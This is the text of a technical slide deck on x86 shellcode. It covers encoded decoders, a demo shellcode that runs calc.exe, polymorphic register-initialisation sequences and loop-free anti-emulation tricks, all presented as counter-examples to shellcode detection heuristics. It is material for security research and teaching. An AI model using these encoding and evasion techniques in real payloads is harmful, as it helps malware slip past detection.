  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  49                     DEC ECX
  00 51 00               ADD BYTE PTR DS:[ECX + 00], DL
  49 00 41 00            DEC ECX + NOP
  49                     DEC ECX
  00 51 00               ADD BYTE PTR DS:[ECX + 00], DL
  49                     DEC ECX
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 31                  ADD BYTE PTR DS:[ECX], DH
Example Shellcode: Alphanumeric Unicode, Upper-case (cont.)
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  49 00 41 00            DEC ECX + NOP
  4A                     DEC EDX                                   ; DL = 01
  00 51 00               ADD BYTE PTR DS:[ECX + 00], DL
  49                     DEC ECX
  00 31                  ADD BYTE PTR DS:[ECX], DH
  00 41 00               ADD BYTE PTR DS:[ECX + 00], AL (NOP)
  59 00 41 00            POP ECX + NOP
  5A                     POP EDX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  l1: 41                 INC ECX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  41                     INC ECX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  41                     INC ECX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  41                     INC ECX
  00 42 00               ADD BYTE PTR DS:[EDX + 00], AL
  33 00 30               [IMUL EAX, DWORD PTR DS:[ECX], +10]       ; stored bytes; the fix-ups above produce the bracketed form
  00 41 00               [ADD AL, BYTE PTR DS:[ECX + 02]]
  50 00                  [MOV BYTE PTR DS:[EDX], AL]
  42                     INC EDX
  00 39 00               [CMP BYTE PTR DS:[ECX], 41]
  34 00                  [JNE l1]
  34 00                  XOR AL, 00
  4A 00 42 00            [encoded E2]
Example Shellcode: Alphanumeric Unicode, Upper-case
Decoder:
44444444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1
AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A
PB944JB
Our shellcode:
OCKOBDDKCONPDKCOLLDKCGMLFMDKCHLHDKCGOLDKCDONCHDKQLONMPL
CIOOCJMOUDKMDFKCQOLOJQGBIBNPECEKCDKCDONMLLCKGLCOLFNOCJMQ
EBHCHBCBMBDDKKDOVQEQFKOIGA
Example Shellcode: Fewest unique bytes
- Recent challenge run by MSEC
- Run calc.exe on all major Windows platforms
- Restricted register set, too

  void __declspec(naked) __cdecl run(void *buffer)
  {
      __asm
      {
          push ebp
          mov  ebp, esp              ; frame pointer, so [ebp + 8] is the buffer argument
          xor  eax, eax              ; every other register enters the shellcode as zero
          xor  ecx, ecx
          cdq                        ; edx = 0 (sign-extension of eax)
          xor  ebx, ebx
          xor  esi, esi
          xor  edi, edi
          jmp  dword ptr [ebp + 8]   ; jump into the buffer
      }
  }

- It can be done using only 3 distinct byte values
- Or even 2, but platform-specific
Common Characteristics
- Get load point
- Initialise registers
- Read from memory
- Decrypt
- Write to memory
- Adjust pointer
- Loop
Common Characteristics: Example decryptor
  l1: EB 1D              JMP SHORT l4                              ; get load-point
  l2: 5A                 POP EDX                                   ; EDX = address of the encrypted code (after l4's CALL)
      52                 PUSH EDX                                  ; kept for the final RETD
      31 C9              XOR ECX, ECX                              ; initialise registers
      66 B9 34 12        MOV CX, 1234                              ; dword count
      B8 BC 9A 78 56     MOV EAX, 56789ABC                         ; key
  l3: 8B 1A              MOV EBX, DWORD PTR DS:[EDX]               ; read from memory
      31 C3              XOR EBX, EAX                              ; decrypt
      01 C3              ADD EBX, EAX
      31 C3              XOR EBX, EAX
      89 1A              MOV DWORD PTR DS:[EDX], EBX               ; write to memory
      83 C2 04           ADD EDX, +04                              ; adjust pointer
      E2 F1              LOOPD l3                                  ; loop
      C3                 RETD                                      ; return into the decrypted code
  l4: E8 DE FF FF FF     CALL NEAR l2
Common Characteristics: Get load-point
(same decryptor listing; this step is JMP SHORT l4, CALL NEAR l2 and POP EDX, with PUSH EDX keeping a copy for the final RETD)
Common Characteristics: Initialise registers
(same listing; XOR ECX, ECX and MOV CX, 1234 set the count, MOV EAX, 56789ABC the key)
Common Characteristics: Read from memory
(same listing; MOV EBX, DWORD PTR DS:[EDX])
Common Characteristics: Decrypt
(same listing; XOR EBX, EAX / ADD EBX, EAX / XOR EBX, EAX)
Common Characteristics: Write to memory
(same listing; MOV DWORD PTR DS:[EDX], EBX)
Common Characteristics: Adjust pointer
(same listing; ADD EDX, +04)
Common Characteristics: Loop
(same listing; LOOPD l3)
Counter-examples: Initialise registers indirectly
Common direct ways:
- MOV
- PUSH/POP
Arithmetic is indirect:
- ADC/ADD
- AND
- OR
- SBB/SUB
- XOR
Counter-examples: Set EAX to 0
  81 C8 FF FF FF FF      OR EAX, FFFFFFFF
  81 C0 01 00 00 00      ADD EAX, 00000001
Can be applied to individual bits:
  81 C8 81 81 81 81      OR EAX, 81818181
  81 C8 42 42 42 42      OR EAX, 42424242
  81 E8 C3 C3 C3 C3      SUB EAX, C3C3C3C3
  81 C8 3C 3C 3C 3C      OR EAX, 3C3C3C3C
  81 C0 C4 C3 C3 C3      ADD EAX, C3C3C3C4
(the two ORs set every bit of C3C3C3C3 and the SUB clears exactly those bits, leaving EAX AND 3C3C3C3C; the next OR makes that 3C3C3C3C, and adding C3C3C3C4 wraps to 0)
- Can be hidden among do-nothing instructions
- Can also be made polymorphic…
Counter-examples
The register-initialisation arithmetic made polymorphic: every entry is one 6-byte 81 /r imm32 instruction (two columns of 32, as on the slide).
  ADC ECX, A4DE2B66        SUB ESI, 5021003D
  ADC EAX, 310FB211        CMP ESI, A13F27A6
  ADC ESI, 561B22A1        CMP EDX, CAC7F483
  AND EDI, 079ED301        XOR EDI, B5BBC44B
  AND ESI, D7BAD9C9        SUB EAX, 44CA0612
  SBB EAX, 5F8565FE        CMP EAX, 6FA086EE
  OR EDX, 396AD235         OR EDI, 0E14F824
  SBB EBX, 6756BEBD        XOR EAX, 2F12F7EA
  XOR EDX, B653BA04        SUB EBP, 40E69114
  CMP ESI, D38FCAAC        SUB EDI, 2849ADCD
  AND EDI, EE448EBE        SBB ECX, BDA8F414
  CMP EBP, F17E3846        CMP EDX, EB97A32E
  OR EDI, 003158E1         ADD ESI, 88679DCB
  ADD EBP, 9A4AF924        SUB ESI, 70A45453
  ADD EBX, 90259C0F        XOR EDI, 8B160EC2
  AND EDX, 942485CC        SUB ESI, 85F2652B
  AND EAX, 42FE2F1D        ADC EBX, 4C6ADF82
  ADD ESP, 1163B7B6        SBB EBP, 0979EB12
  AND EDX, 49C61F4C        SUB EDI, 6F305544
  AND ESI, 81200651        SUB EBX, C3739738
  ADD EBX, B0923E89        ADD EDX, 64A4B9E5
  ADD EDX, 030BD43F        SUB ECX, BD2D5A0F
  XOR ECX, 42775883        CMP ESP, EDC13D4C
  XOR EDX, 97778FE1        OR EAX, 8580D53F
  ADD EBX, 54B020DF        XOR EDX, D59D7AC1
  AND ESI, 16A23DCB        SBB EAX, BA363130
  ADC ESI, D8834285        SUB ECX, 70A7B58B
  SBB EBX, EB4FD95A        SUB EBX, D75318FE
  SBB EBP, 9109B7C2        CMP ESP, C00E1E80
  CMP EBX, D288F475        XOR EDX, DC686E26
  OR ESI, A6363F48         ADC ESP, F0A22086
  CMP EDI, 660BD7D5        OR EBP, 704DEA4C
Counter-examples
(polymorphic sequence, continued)
  CMP EDX, A99B09D9        ADD EBP, 9C778CF6
  AND ESP, FFFFFFFF        SUB ESP, B6C8180D
  SUB EBP, F876D305        XOR EDX, 78EEC76D
  OR EDX, 4C0E102A         OR EBP, 27ECB741
  SUB ESP, 0205D83C        SBB ECX, 5A0E7A16
  AND EDX, AF2AEF1D        AND ESI, 5E009E50
  XOR EDI, A4C82CC3        XOR ESP, 87F0FEE3
  ADC EAX, FB2AB237        SBB ESI, 1DF111D5
  OR EBX, CD1FE0BC         OR ESP, 00000000
  SUB ESP, 1583C8BB        OR EDI, 519615E3
  OR EBP, 44F9705A         SUB EDX, A22B7450
  AND ESP, FFFFFFFF        SUB EBX, BB4C8984
  CMP ECX, BFEA8ADF        SUB ECX, D03BC978
  XOR EBX, C5128D77        XOR EDI, 67081D62
  AND ESI, 05B2F164        OR ECX, 08E85EB1
  OR EDI, 9DA79C60         OR ESP, 00000000
  ADD ESI, 0A202BDD        OR ESI, A2D291D3
  ADD EDX, 07B43148        AND ECX, 36D42F86
  OR ECX, 3AF38B9A         XOR EDI, 9AA539C1
  ADC ESP, CE6D8A04        CMP EDX, 8376983C
  ADD ECX, BB13CDBF        CMP EAX, AA1752DF
  AND ECX, A17AB4B9        XOR EBP, 8DF69809
  SBB EDX, 058FDF56        SUB EBX, 68CDEB14
  SUB ESP, B8E9C149        SUB ECX, E97337B2
  SUB ESI, B7E0B4F2        SUB EDI, 1D2C6CD9
  XOR EBX, AB3A3B45        CMP EBP, 279F39BA
  SUB ESP, 4937E7F3        ADD ECX, B92C7C5B
  CMP EDX, F9C4A2CF        OR EBX, 47766CDE
  OR EAX, A80D8739         CMP EDI, B5A7D5B6
  SUB EBP, E26D3CF1        ADC ECX, 5ED2857D
  OR EDX, 00FB8C6C         CMP ECX, 5B1759AB
  SBB EDI, 66EB3996        XOR EBP, 2DBD271B
Counter-examples
(polymorphic sequence, continued)
  CMP EDI, 56BB7396        AND EAX, 7F41448C
  XOR ESP, 87F0FEE3        AND EDI, 5019B903
  SBB EBP, BF9A8072        XOR EDX, E333A15F
  XOR EDX, FB9ACE98        SUB EBP, B95A5CCE
  AND EDX, EA048212        ADD EDX, 73C536D0
  ADD ESP, DAA364FE        SUB ESI, 4A60FEB3
  OR ECX, 730EEF5F         OR EDI, 3D4C8D5D
  CMP EDI, CD391ED2        OR ESP, 00000000
  XOR EAX, A46BC22E        ADD ESP, 255C9B02
  AND EBX, 39DC4C3E        OR ECX, 49CEDC48
  AND EDI, AF194FC6        ADC ESP, 16B1B037
  OR EBP, 64A8590B         OR EDI, A1775D0D
  ADD EAX, 41C0C14A        CMP EAX, 1BF920A0
  SUB ESI, 6C4D7ABE        ADD ESP, 4DFFAF05
  SBB ECX, B5FFE221        CMP EBX, 7D7E5145
  OR EDI, 0C8A5C0F         SUB EBP, 0A1F1593
  SBB EBP, 88582742        CMP ECX, 2FB018D7
  AND ECX, 55BB5CD8        CMP EBX, 475CF898
  AND ESP, FFFFFFFF        AND EAX, 79AD5A05
  OR EBX, 3D956FFA         ADD EDI, DB73C000
  ADC EAX, 4A6EC552        AND EAX, D431885B
  XOR EBX, E1F75857        CMP EBP, 4E6E99DA
  ADC ESI, 3B294C64        AND EBX, EB8D5DC4
  CMP EDI, D12BBDAA        AND EDX, B057A1D7
  AND EBX, 28D1AA1B        OR EDX, 3429ED46
  ADD EBX, AC8D884E        CMP EAX, 9BDCA2CB
  AND ECX, 9021E911        SBB ESI, 61F38BD3
  SBB ESI, 9C23AD1E        SUB EDI, 5E09B378
  SBB ESI, 02304282        OR EDI, A951C474
  ADC EDI, 13FEF812        ADD ESI, 7929E5AD
  CMP EBP, 3AC4A3DA        AND EBX, 79DB3643
  CMP EBP, 6E4F8EB4        AND ESI, 965A4828
Counter-examples: No reads from memory
Store absolute values
  68 00 56 FF D7         PUSH D7FF5600
  68 00 8B F4 6A         PUSH 6AF48B00
  68 68 63 6D 64         PUSH 646D6368
  68 F7 03 3C AE         PUSH AE3C03F7
  68 74 3E 1C 03         PUSH 031C3E74
  68 45 75 F3 8B         PUSH 8BF37545
  68 3A 57 69 6E         PUSH 6E69573A
  68 14 AB 81 3C         PUSH 3C81AB14
  68 33 ED 45 8B         PUSH 8B45ED33
  68 3E 20 03 DF         PUSH DF03203E
  68 3E 78 8B 5C         PUSH 5C8B783E
  68 77 3C 8B 74         PUSH 748B3C77
  68 8B 78 08 8B         PUSH 8B08788B
  68 8B 77 1C AD         PUSH AD1C778B
  68 00 8B 78 0C         PUSH 0C788B00
  68 64 67 A1 30         PUSH 30A16764
  54                     PUSH ESP
  C3                     RET                                       ; the plain-binary shellcode now starts at ESP
The dwords are the plain-binary example pushed last-to-first, so the decoder never reads its own bytes; the code only writes them.
Counter-examples: Store absolute values
  57                     PUSH EDI
  B8 64 67 A1 30 AB      MOV EAX, 30A16764 + STOSD
  B8 00 8B 78 0C AB      MOV EAX, 0C788B00 + STOSD
  B8 8B 77 1C AD AB      MOV EAX, AD1C778B + STOSD
  B8 8B 78 08 8B AB      MOV EAX, 8B08788B + STOSD
  B8 77 3C 8B 74 AB      MOV EAX, 748B3C77 + STOSD
  B8 3E 78 8B 5C AB      MOV EAX, 5C8B783E + STOSD
  B8 3E 20 03 DF AB      MOV EAX, DF03203E + STOSD
  B8 33 ED 45 8B AB      MOV EAX, 8B45ED33 + STOSD
  B8 14 AB 81 3C AB      MOV EAX, 3C81AB14 + STOSD
  B8 3A 57 69 6E AB      MOV EAX, 6E69573A + STOSD
  B8 45 75 F3 8B AB      MOV EAX, 8BF37545 + STOSD
  B8 74 3E 1C 03 AB      MOV EAX, 031C3E74 + STOSD
  B8 F7 03 3C AE AB      MOV EAX, AE3C03F7 + STOSD
  B8 68 63 6D 64 AB      MOV EAX, 646D6368 + STOSD
  B8 00 8B F4 6A AB      MOV EAX, 6AF48B00 + STOSD
  B8 00 56 FF D7 AB      MOV EAX, D7FF5600 + STOSD
  C3                     RET                                       ; returns to the saved EDI, where the shellcode was just written
Counter-examples: Transform absolute values
  57                     PUSH EDI
  B8 64 67 A1 30 AB      MOV EAX, 30A16764 + STOSD
  2D 64 DC 28 24 AB      SUB EAX, 2428DC64 + STOSD
  05 8B EC A3 A0 AB      ADD EAX, A0A3EC8B + STOSD
  2D 00 FF 13 22 AB      SUB EAX, 2213FF00 + STOSD
  2D 14 3C 7D 16 AB      SUB EAX, 167D3C14 + STOSD
  2D 39 C4 FF 17 AB      SUB EAX, 17FFC439 + STOSD
  05 00 A8 77 82 AB      ADD EAX, 8277A800 + STOSD
  2D 0B 33 BD 53 AB      SUB EAX, 53BD330B + STOSD
  2D 1F 42 C4 4E AB      SUB EAX, 4EC4421F + STOSD
  05 26 AC E7 31 AB      ADD EAX, 31E7AC26 + STOSD
  05 0B 1E 89 1D AB      ADD EAX, 1D891E0B + STOSD
  2D D1 36 D6 88 AB      SUB EAX, 88D636D1 + STOSD
  05 83 C5 1F AB AB      ADD EAX, AB1FC583 + STOSD
  2D 8F A0 CE 49 AB      SUB EAX, 49CEA08F + STOSD
  05 98 27 87 06 AB      ADD EAX, 06872798 + STOSD
  05 00 CB 0A 6D AB      ADD EAX, 6D0ACB00 + STOSD
  C3                     RET
Each stored dword is derived from the previous one, so only the first immediate appears in the clear. (Carrying the arithmetic through gives 8BF27545 for the eleventh store, where the stored-value versions have 8BF37545, the dword containing the JNE displacement; the chain as printed is off by 10000h there.)
Counter-examples: No writes to memory
This space intentionally left blank
Counter-examples: No pointer adjustment
- Same as register initialisation
- Might be obscure arithmetic
Counter-examples: No loop
  6A 03                  PUSH +03
  59                     POP ECX
  E8 04 00 00 00         CALL NEAR l1
  58                     POP EAX
  58                     POP EAX
  5C                     POP ESP
  59                     POP ECX
  l1: 49                 DEC ECX
  51                     PUSH ECX
  0F 95 C1               SETNE CL
  33 C0                  XOR EAX, EAX
  64 89 20               MOV DWORD PTR FS:[EAX], ESP
  D0 C9                  ROR CL, 01
  CE                     INTO
- Does this code run at all?
- If so, how does it work?
- If it runs, how many times?
Thank you
Check me out: http://pferrie.tripod.com
Questions?